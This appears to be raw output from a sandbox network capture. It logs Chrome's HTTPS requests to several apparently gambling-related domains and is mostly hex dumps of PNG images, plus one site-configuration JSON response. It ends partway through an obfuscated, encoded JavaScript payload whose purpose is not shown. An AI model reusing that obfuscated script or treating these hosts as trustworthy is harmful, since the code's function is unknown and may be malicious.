                                                                                                                                                          2024-06-09 22:41:25 UTC9718INData Raw: df 44 32 43 35 77 a9 25 37 68 64 4f 6f a1 74 e4 d2 03 7f bf 07 8f 16 8d c2 4b 1c e5 71 19 75 95 46 de 48 54 69 e5 d0 de 3f 9d 0b 5b 37 3e 30 23 71 ed 5b d1 ac 9b d7 44 4e 5b 70 d1 b5 da a3 f4 f1 92 84 2e 29 e5 2d dc 07 0f 35 8c 51 ab 04 e3 30 02 4f 1f 3e c3 78 d2 c3 b8 21 54 ad 46 05 c8 d4 8a aa b5 da b9 f6 24 4c 99 64 f2 2b 10 b3 10 05 2a 15 41 e7 a1 8a 1e a1 47 25 cd 42 81 ae 18 5e 4e 10 b1 80 41 87 6e 73 4e 21 b8 83 31 d8 bc 69 2b 04 11 94 b6 77 b6 a2 b7 84 ee 37 b1 64 d3 14 56 8b 1e 72 b3 32 a0 b0 a8 94 29 d4 89 b3 df 89 af a5 fe 23 93 49 c7 d4 1f 0e 3c d1 94 62 a0 98 88 d9 84 2e 3d d1 c4 73 b1 8b 12 65 42 60 ac d3 80 ee 2b 45 7e 4d 66 43 2a 73 8d 9b 1c c4 cd a5 52 09 f4 02 41 8a 86 a0 a9 a9 05 0e 37 36 a3 d9 13 20 3f 9f ba 27 b3 c1 e9 75 a3 c0 76 42
                                                                                                                                                          Data Ascii: D2C5w%7hdOotKquFHTi?[7>0#q[DN[p.)-5Q0O>x!TF$Ld+*AG%B^NAnsN!1i+w7dVr2)#I<b.=seB`+E~MfC*sRA76 ?'uvB


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          717192.168.2.55049923.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:24 UTC598OUTGET /pc/image-pc/lang_pz/paiz1.png HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                          Referer: https://xpj723.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:25 UTC618INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:25 GMT
                                                                                                                                                          Content-Type: image/png
                                                                                                                                                          Content-Length: 77864
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Wed, 25 Jul 2018 02:55:10 GMT
                                                                                                                                                          ETag: "5b57e68e-13028"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE4-CACHE2[5],EU-GER-frankfurt-EDGE4-CACHE2[0,TCP_HIT,3],EU-FRA-paris-GLOBAL1-CACHE30[4],EU-FRA-paris-GLOBAL1-CACHE11[0,TCP_HIT,2],1.1 google
                                                                                                                                                          X-CCDN-Expires: 2473784
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: 2ac7a1583e9d54123db21516cfd85d77
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 118216
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:25 UTC15766INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 ac 00 00 00 d1 08 06 00 00 00 90 03 86 07 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 03 26 69 54 58 74 58 4d 4c 3a 63 6f 6d 2e 61 64 6f 62 65 2e 78 6d 70 00 00 00 00 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 36 2d 63 31 33 38 20 37 39 2e 31 35 39 38 32 34 2c 20 32 30 31 36 2f 30 39 2f 31 34 2d 30 31 3a 30 39 3a 30 31 20 20
                                                                                                                                                          Data Ascii: PNGIHDRtEXtSoftwareAdobe ImageReadyqe<&iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01
                                                                                                                                                          2024-06-09 22:41:25 UTC16384INData Raw: 4a 70 6c 7d 43 1c b4 f9 0d 61 57 57 f2 07 d9 be 63 37 74 6d db 0a 15 7e a9 89 21 e3 86 63 06 03 2d 0b 8b 39 9c c8 30 7a f4 68 1e 90 db 93 bd 10 02 a8 c3 87 0f a3 6a d5 aa e8 d6 ad 1b 27 3f 50 5c 14 59 57 34 66 20 ba ff c8 62 32 76 01 18 5b 5b e4 42 24 0b 89 a8 e6 74 1d ad 29 c3 05 09 29 36 8d 79 bd 7c f9 92 bb f8 c8 7a a2 80 3b c3 e9 48 de b7 98 02 1b c3 a4 bb c6 e7 1a bb 38 45 92 86 18 74 2c 5e 6b 3c 30 6b 3c 26 66 78 5d ba d0 c2 67 0d ae 07 d9 e1 b2 77 43 b8 cf ae 8a 0e d5 3f c7 c4 f6 df a0 f6 97 12 a8 ef 0e 82 d3 9c 1a d7 72 ab 61 ca a9 5e 98 74 cd 2a b3 a6 d5 10 dd 82 34 85 7c 62 4c 04 34 14 33 25 65 40 45 59 30 68 dc 46 16 c3 7a 99 32 7d dc 92 e1 9a e8 ec 14 fb 44 0d 3d 31 eb 08 80 68 cd 67 05 e6 c9 75 e5 7a a0 21 20 10 09 0d 22 f8 11 50 88 01 c0 1a
                                                                                                                                                          Data Ascii: Jpl}CaWWc7tm~!c-90zhj'?P\YW4f b2v[[B$t))6y|z;H8Et,^k<0k<&fx]gwC?ra^t*4|bL43%e@EY0hFz2}D=1hguz! "P
                                                                                                                                                          2024-06-09 22:41:25 UTC16384INData Raw: f5 76 38 15 16 8e 4d 6b 1d d4 fa 5c 61 61 b7 b3 5d 0c 38 60 25 e7 16 96 ac 9d f6 0c bc 66 dd 81 c4 dd 9f 61 c6 87 bf 82 bf e9 7d 08 76 78 09 87 37 fd 05 a5 fa 0a a2 57 a0 f7 53 6b 6b 82 b7 ef 41 f9 a2 dd 11 10 18 a8 e6 86 38 f7 a4 25 df 86 87 87 ab d7 0c fd 51 c2 bd 65 cb 16 a5 f0 8b 17 0a cd 79 23 e6 51 a5 29 ef af 42 95 13 c5 f0 21 6b 59 51 15 c8 84 5a 3e 28 31 67 12 31 15 84 7c 70 5b 2a 06 19 5a e4 6b ce 57 31 87 8b fb b1 b2 30 ad 93 f8 e0 dc 54 ac d0 77 32 24 9e 83 e2 06 66 97 f3 5a b4 07 df e7 3e 54 2f 32 ff 4b 09 20 04 00 99 9b c5 6b d1 1e bc 56 86 ed 78 1c 86 fc c8 20 99 15 cf 6d b9 9e d5 8c a9 38 e4 84 31 cf c7 bc 33 3e a2 a3 a3 55 92 33 01 94 e7 22 48 6a d7 ad 81 39 73 d3 3a 65 9f b6 fa ba 1b 8d f2 38 b9 9e b7 05 bb 96 dc 0f af 85 bf 83 db c2 97
                                                                                                                                                          Data Ascii: v8Mk\aa]8`%fa}vx7WSkkA8%Qey#Q)B!kYQZ>(1g1|p[*ZkW10Tw2$fZ>T/2K kVx m813>U3"Hj9s:e8
                                                                                                                                                          2024-06-09 22:41:25 UTC16384INData Raw: d6 89 d5 df 85 d7 99 9c 16 dd f5 b8 dd 3d ac ee 61 c5 7a 62 18 51 cb 16 51 01 6c 43 f1 49 78 d9 0c 67 06 38 08 9e 9b 5f c6 f8 d7 25 98 39 ea 65 38 1a ff 08 bb 8d af c3 78 d7 f8 5e 69 25 d1 63 bb 50 ca 12 6c 90 31 e2 ca 45 44 89 72 39 41 a1 a6 a2 b2 4b fe 47 2a d9 54 27 7f 4f 0a 11 04 04 e4 59 91 02 86 10 7a 13 5a 7e 10 75 9c 28 f0 94 9f 92 02 64 95 12 e2 47 b5 5c 9d bd a9 56 ba bd a3 b9 4e 41 75 a1 6d ed 77 97 61 08 54 f6 4e 59 52 9b 80 91 a8 ef f4 4c 05 9d 04 5e e2 fc 57 0b db 9f 3a 18 0b 22 b8 e2 f6 28 e4 61 89 1b 57 8a 3b 15 d7 31 2f b2 be 82 79 62 35 94 bf 2a 44 53 7d 33 6a 0a 54 7b 58 7f 05 bb 90 e7 82 65 e1 db e2 fc 42 ee 69 64 33 2f 83 1a 1a e6 66 e7 f0 7b 8d 40 ad ad b3 03 17 c2 c3 99 c7 72 8d 53 e0 a9 69 22 6d cb cd c9 41 63 43 23 6e de 4c 40 05
                                                                                                                                                          Data Ascii: =azbQQlCIxg8_%9e8x^i%cPl1EDr9AKG*T'OYzZ~u(dG\VNAumwaTNYRL^W:"(aW;1/yb5*DS}3jT{XeBid3/f{@rSi"mAcC#nL@
                                                                                                                                                          2024-06-09 22:41:25 UTC12946INData Raw: d4 56 97 30 af a2 11 75 e5 6d 68 ac 50 ed 61 3d 6c 76 d1 bd 9c 43 58 77 2f 0f a8 af bc a3 9e b4 14 b9 d7 42 93 63 02 2b f2 28 2b 99 dd 52 ed 59 c0 69 47 4c 1e f9 3e 1c 6c 0c e1 e7 66 02 af e3 7a c8 b8 69 82 da 82 93 30 db f1 13 e6 4c 18 8e 4d ab 7f 86 ba da 6c 2c fa f9 5b 6c 5f fb 13 c6 7d fa 22 86 bf fd 0c 26 0d 7b 13 da bb 66 c2 c6 78 31 ce b9 6e c7 59 37 1d 84 7a 99 c0 c9 66 0f 36 ad 98 89 03 5b 67 20 f6 a2 1b b3 b9 22 34 b0 49 5c 5f da 45 9f 78 58 d7 23 0c d3 03 75 07 a1 a1 78 0f 6c 34 3e c3 f1 25 4f c3 69 c7 40 38 ef 7d 17 f5 b9 b2 36 0d 6d cd 3c 24 58 c1 fe 40 3a 3a 52 bd b0 a4 a4 14 8e f2 bc 48 30 3b 8f 01 47 a0 28 1c d0 80 cc cc 0c 5e 28 9c 92 92 82 fc fc 7c 5c bb 76 8d b7 b4 8f 8a 8a 62 9f 3b c1 01 8a 0a 88 0f 1f 3e 0c 17 17 17 de 39 98 06 78 aa
                                                                                                                                                          Data Ascii: V0umhPa=lvCXw/Bc+(+RYiGL>lfzi0LMl,[l_}"&{fx1nY7zf6[g "4I\_ExX#uxl4>%Oi@8}6m<$X@::RH0;G(^(|\vb;>9x


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          718192.168.2.55050190.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:25 UTC380OUTGET /pc/image-pc/index/312/nav/lottery/01.png HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:25 UTC618INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:25 GMT
                                                                                                                                                          Content-Type: image/png
                                                                                                                                                          Content-Length: 68837
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Fri, 06 Sep 2019 06:36:49 GMT
                                                                                                                                                          ETag: "5d71fe81-10ce5"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE1[2],EU-GER-frankfurt-EDGE5-CACHE4[0,TCP_HIT,0],EU-FRA-paris-GLOBAL1-CACHE26[9],EU-FRA-paris-GLOBAL1-CACHE23[0,TCP_HIT,7],1.1 google
                                                                                                                                                          X-CCDN-Expires: 2465101
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: 1dc963b0e94450e7b6c307b1d00c8f85
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 126903
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:25 UTC15766INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 b0 00 00 00 b7 08 06 00 00 00 b2 b2 d4 e6 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 20 63 48 52 4d 00 00 7a 26 00 00 80 84 00 00 fa 00 00 00 80 e8 00 00 75 30 00 00 ea 60 00 00 3a 98 00 00 17 70 9c ba 51 3c 00 00 00 06 62 4b 47 44 00 00 00 00 00 00 f9 43 bb 7f 00 00 80 00 49 44 41 54 78 da dc fd 67 b4 2d 49 76 1e 06 7e 7b 47 44 ba 63 af 37 cf db 32 af 7c 75 55 7b 0f d3 30 24 41 40 03 d0 2d d0 cf 00 9c 59 8b 33 1a 92 22 35 00 d1 92 40 cd 12 47 14 67 89 4b e4 10 a4 44 10 1a 36 45 02 20 d8 68 10 a6 0d ba ba 0b 5d d5 e5 bd 7d f5 fc 7b d7 df 7b 7c ba 30 7b 7e 9c 7b 5f bd aa ae ee 06 3d 47 b1 56 de 73 4e 9e cc 3c 79 23 be dc b1 e3 db 8e 44 44 e1 3f 62 0b df e5 7b fe b7 38 9f 05 80 db ff a0
                                                                                                                                                          Data Ascii: PNGIHDRgAMAa cHRMz&u0`:pQ<bKGDCIDATxg-Iv~{GDc72|uU{0$A@-Y3"5@GgKD6E h]}{{|0{~{_=GVsN<y#DD?b{8
                                                                                                                                                          2024-06-09 22:41:25 UTC16384INData Raw: d3 c3 32 9f f9 c0 87 1e 78 ba 0a 60 17 02 45 9a a1 22 85 a4 49 c8 0b 08 33 ea 96 4e 6f b3 16 c4 86 2f 34 b3 ec f3 c7 d2 63 a7 27 85 bd 42 91 e1 f1 60 f4 53 06 fa 7f 6c 64 d9 f7 bf f5 e6 5b cf 2d ac 2c 27 b6 1c 97 21 04 e9 ce ce 5f 4f 34 7b d1 a0 ff e6 6f fc c3 9f ac c8 dc 7d c7 99 bb f1 d2 a3 cf 00 1b 25 e0 15 90 08 a0 6b 50 6c 11 fb 1c f3 69 85 76 47 61 b7 1e c1 d6 2d 50 39 03 0a 84 d9 99 0c ef bf b3 85 7b 32 e0 b9 7a 11 91 09 50 00 1e bc 7d 09 97 2f f5 91 2e cf e3 62 bd 8e 56 14 a1 3b bf 88 bd bc 82 4d 0d 9a 59 8a 7c 38 80 94 25 96 66 67 91 c4 06 71 a8 d1 6a c4 68 a4 31 62 a3 e1 83 47 5d 55 50 60 b8 e0 90 c6 e6 66 3d 88 29 01 39 cd 63 11 7c 40 62 22 cc 74 3a d8 d9 1e 4e e3 a7 f6 3d d3 44 08 55 65 e1 d3 00 ef a7 69 ff a3 44 a1 2c 1c bc 67 a4 3a 81 f5 1e
                                                                                                                                                          Data Ascii: 2x`E"I3No/4c'B`Sld[-,'!_O4{o}%kPlivGa-P9{2zP}/.bV;MY|8%fgqjh1bG]UP`f=)9c|@b"t:N=DUeiD,g:
                                                                                                                                                          2024-06-09 22:41:25 UTC16384INData Raw: 2d c6 5a ac d6 25 97 c1 1a 5c d7 c1 18 f3 27 ba b0 d8 e3 47 dc ed d0 0a 89 e3 96 47 0a 63 0c 5b 5b 9b bc f8 ad 6f a1 27 23 aa 91 c4 13 06 87 1c 29 34 95 6a 84 12 39 c2 53 a4 93 18 37 f0 19 8e 72 66 a2 90 c0 f5 70 d2 98 f7 df 7c 0d bb c7 3f dd ee f7 69 6f 6d 30 1e f4 09 23 9f a9 d6 14 d9 5e fc 6a 18 85 54 5d 17 2b 05 5b e3 3e 42 08 0e 1e 38 40 a7 dd 26 b4 9a 3c 2f 4a 83 6c 25 b1 52 30 1a 0d 49 f2 1c a4 28 69 93 52 e1 b8 2e d6 1a b4 2e f6 a0 b9 8c 4e bb cb a5 8b 57 18 0c 07 54 7c 89 d1 9a 24 49 88 5a d3 34 1a 0d 4e 9d 3a 89 e7 b8 68 e3 62 7d 8b ef fb 38 4e 09 9f ed 0d c6 88 1f 18 35 95 78 39 dc c3 8e a5 14 98 34 a7 48 33 8c 55 65 00 4e 32 c1 73 21 4f 86 54 2b 29 e8 1b ec 5b dc 72 1b 95 f8 48 e8 45 b3 3a ed 4f aa 95 6a 14 85 53 ab be 33 5b f3 32 6f 4b 29 95
                                                                                                                                                          Data Ascii: -Z%\'GGc[[o'#)4j9S7rfp|?iom0#^jT]+[>B8@&</Jl%R0I(iR..NWT|$IZ4N:hb}8N5x94H3UeN2s!OT+)[rHE:OjS3[2oK)
                                                                                                                                                          2024-06-09 22:41:25 UTC16384INData Raw: 90 93 64 ec 78 9e 63 94 f4 ad 23 8d 3d fb de 1b 43 a1 bb ce e2 54 f1 73 81 de 76 ce bd f4 f5 53 6b 17 cf 7f ae 88 cd c9 8a 2d be e0 a5 3b 8f bf f6 8d df 78 6c 4e c5 4c 05 1e 42 39 78 a1 57 52 f2 94 2a ad 90 7c 1f ab 24 52 f9 88 60 0a 69 3d 1c 23 51 f9 9e 35 e1 95 ab 5c f9 e6 d7 b8 fd ca 5b d8 4e ce ce ca 0e 61 a5 c1 91 d3 f7 71 64 df 7e 0e 1e 5c 02 d7 e1 ec d9 0b 5c b8 70 95 24 91 2c ce 36 b0 29 1c 58 5a 60 69 66 8a 99 7d 33 98 61 c6 b7 bf f3 35 0e 1d 39 80 f2 5c a6 a7 3c 9e 7a e2 04 a7 8e 3f 82 32 9a 8d ad 4d 72 a1 48 92 1c 95 a5 9c de 37 cb a7 9f 79 90 c9 c6 2a cf 9e 7c 90 f7 5e 7f 93 7d 51 03 0f c5 d9 77 df e3 e0 c7 5f 20 bf 76 93 d5 95 15 e6 8e 1f a1 db de c5 2b 2c d9 70 8c 4e 26 5c bc 78 91 d5 1b d7 b8 76 e9 32 53 7e 44 35 8c 68 cd cd e0 78 2e a7 0f
                                                                                                                                                          Data Ascii: dxc#=CTsvSk-;xlNLB9xWR*|$R`i=#Q5\[Naqd~\\p$,6)XZ`if}3a59\<z?2MrH7y*|^}Qw_ v+,pN&\xv2S~D5hx.
                                                                                                                                                          2024-06-09 22:41:25 UTC3919INData Raw: 4a 1b 1c 2b 55 3f 3c fa dc 45 91 68 0b 15 2b 3c 27 83 36 11 b9 4c 1a 69 bb 7c 31 0d a5 4d ef 1c 35 47 8f ce 8a c3 77 4f 1a cf 7b 83 46 11 af 81 04 90 92 2d 5b 27 2f 61 b8 ff f2 d9 73 b7 25 19 e7 36 ad e2 83 4e a9 b4 bb e8 64 a7 44 26 53 ac af 2c 0d 04 49 44 ef b6 71 bc de 1c bd e3 fd 74 da 55 ae 2d 5d 64 7a 6f 0f 0f bd 7b 37 c5 3e 81 95 b1 c9 67 3d f2 72 17 56 a2 68 d7 ab 24 b1 02 bb 4e 3e 53 a0 be 32 44 bb 3e ce 4a 7d 11 bf 61 f0 1b 16 cf 7c b9 c5 89 e3 2d f6 dc 59 66 7c d7 18 4e bc 41 d8 7c 9e b0 e5 d0 17 0f 32 3c d1 64 7c 7b 0e a9 7a 39 7b 7a 91 44 39 f4 15 7a c8 58 0e 65 db e0 c8 88 42 49 50 a8 38 0c 8d 0e 32 99 1f 25 8c 6b d4 23 cd 58 56 d9 88 8d 7f f4 93 0f 3f f6 e8 e9 6a f9 a7 3f 7e f4 ca a9 4a 7f ff aa 1f 2e cf b8 93 fd 83 9d f6 06 ba b7 c8 e4 7d
                                                                                                                                                          Data Ascii: J+U?<Eh+<'6Li|1M5GwO{F-['/as%6NdD&S,IDqtU-]dzo{7>g=rVh$N>S2D>J}a|-Yf|NA|2<d|{z9{zD9zXeBIP82%k#XV?j?~J.}


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          719192.168.2.55050418.66.147.914434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:25 UTC657OUTGET /lt-cloud/stat.do?pv=ajax&pa=host.info&domain=43370d.top&withAgentCode=1&withSettings=1&terminal=1&ts=17972883054778 HTTP/1.1
                                                                                                                                                          Host: ocsapi-aws.bakeddove.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: */*
                                                                                                                                                          Origin: https://43370d.top
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Referer: https://43370d.top/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:26 UTC589INHTTP/1.1 200 OK
                                                                                                                                                          Content-Type: text/plain;charset=utf-8
                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: Tengine
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:25 GMT
                                                                                                                                                          api-elapsed: 38
                                                                                                                                                          x-server: AkamaiNetStorage(jp16)
                                                                                                                                                          access-control-allow-origin: *
                                                                                                                                                          x-via: 1.1 aws:jp (Cdn Cache Server V2.0), 1.1 ocsapi:00 (Cdn Cache Server V2.0)
                                                                                                                                                          Via: 1.1 google, 1.1 02cd8164e89a1598d410a9198582d47c.cloudfront.net (CloudFront)
                                                                                                                                                          Vary: Accept-Encoding,Accept-Encoding,Accept-Encoding
                                                                                                                                                          X-Cache: Miss from cloudfront
                                                                                                                                                          X-Amz-Cf-Pop: FRA60-P4
                                                                                                                                                          X-Amz-Cf-Id: 1Yz7jG1h8GUIB6Glvdt_Q5Jb8PdFNDAYwfvs2RARo7U9lmUCnFvtRw==
                                                                                                                                                          2024-06-09 22:41:26 UTC3585INData Raw: 64 66 61 0d 0a 7b 22 61 6e 61 6c 79 74 69 63 73 43 6f 64 65 22 3a 22 22 2c 22 64 6f 6d 61 69 6e 54 79 70 65 22 3a 31 2c 22 61 67 65 6e 74 43 6f 64 65 22 3a 22 39 32 38 32 39 30 35 32 39 30 39 22 2c 22 73 6e 54 79 70 65 22 3a 31 2c 22 69 63 6f 6e 52 65 6c 22 3a 22 22 2c 22 70 61 79 6d 65 6e 74 54 79 70 65 22 3a 31 2c 22 68 35 41 70 70 4c 61 79 65 72 46 6c 61 67 22 3a 31 2c 22 7a 6f 6e 65 22 3a 22 4b 52 2c 4a 50 2c 50 48 2c 49 44 2c 54 48 2c 56 4e 2c 4b 48 2c 4d 59 2c 4d 59 41 2c 49 4e 44 2c 4f 54 48 22 2c 22 73 6e 22 3a 22 6b 70 30 38 22 2c 22 66 69 72 73 74 50 61 67 65 46 6c 61 67 22 3a 31 2c 22 66 6f 72 77 61 72 64 55 72 6c 22 3a 6e 75 6c 6c 2c 22 69 73 5a 6f 6e 65 22 3a 74 72 75 65 2c 22 73 65 74 74 69 6e 67 73 22 3a 7b 22 73 6d 73 4c 6f 67 69 6e 46 6c
                                                                                                                                                          Data Ascii: dfa{"analyticsCode":"","domainType":1,"agentCode":"92829052909","snType":1,"iconRel":"","paymentType":1,"h5AppLayerFlag":1,"zone":"KR,JP,PH,ID,TH,VN,KH,MY,MYA,IND,OTH","sn":"kp08","firstPageFlag":1,"forwardUrl":null,"isZone":true,"settings":{"smsLoginFl
                                                                                                                                                          2024-06-09 22:41:26 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                          Data Ascii: 0


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          720192.168.2.55050254.150.37.1304434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:25 UTC554OUTGET /pc/240516-03/static/js/components/slides.js HTTP/1.1
                                                                                                                                                          Host: zb-qq.gzjqwlkj.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                          Referer: https://yh8613.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:25 UTC341INHTTP/1.1 200 OK
                                                                                                                                                          Last-Modified: Thu, 16 May 2024 08:58:57 GMT
                                                                                                                                                          Etag: "6645cad1-df7c"
                                                                                                                                                          Server: Tengine
                                                                                                                                                          Date: Sun, 09 Jun 2024 17:13:36 GMT
                                                                                                                                                          Content-Type: application/javascript
                                                                                                                                                          Content-Length: 57212
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          X-NWS-LOG-UUID: 16014678156695469093
                                                                                                                                                          Connection: close
                                                                                                                                                          X-Cache-Lookup: Cache Hit
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:25 UTC16384INData Raw: 61 34 76 6a 65 75 75 65 28 22 4f 34 55 77 52 67 44 67 68 67 78 67 31 67 4b 51 4d 34 48 73 42 32 45 41 55 42 74 41 54 41 64 67 46 59 42 64 41 47 67 47 38 42 42 41 4d 79 51 45 59 41 75 61 67 56 7a 52 67 42 63 42 4c 64 54 64 30 7a 67 4a 54 6b 41 76 71 51 44 6d 41 52 7a 67 41 76 4a 71 77 37 63 30 76 66 71 53 52 43 41 62 6c 41 42 4f 41 41 68 43 6b 30 70 46 41 47 34 41 68 43 7a 5a 63 65 55 49 51 43 4a 6d 53 45 44 71 54 73 74 6e 44 72 65 4e 6f 41 76 4e 69 53 5a 62 41 41 5a 4f 41 41 55 41 43 31 73 42 4d 6e 55 55 54 67 41 54 48 55 44 76 5a 4d 77 55 62 31 73 4c 42 58 52 62 5a 50 59 41 54 77 67 51 46 47 70 4d 45 47 38 62 41 48 34 51 41 44 6f 6f 43 41 67 41 47 7a 7a 4d 54 67 4d 42 42 68 41 42 41 42 38 75 33 6d 71 51 41 41 38 49 46 43 31 32 4a 47 38 55 41 57 46 4d 54
                                                                                                                                                          Data Ascii: a4vjeuue("O4UwRgDghgxg1gKQM4HsB2EAUBtATAdgFYBdAGgG8BBAMyQEYAuagVzRgBcBLdTd0zgJTkAvqQDmARzgAvJqw7c0vfqSRCAblABOAAhCk0pFAG4AhCzZceUIQCJmSEDqTstnDreNoAvNiSZbAAZOAAUAC1sBMnUUTgATHUDvZMwUb1sLBXRbZPYATwgQFGpMEG8bAH4QADooCAgAGzzMTgMBBhABAB8u3mqQAA8IFC12JG8UAWFMT
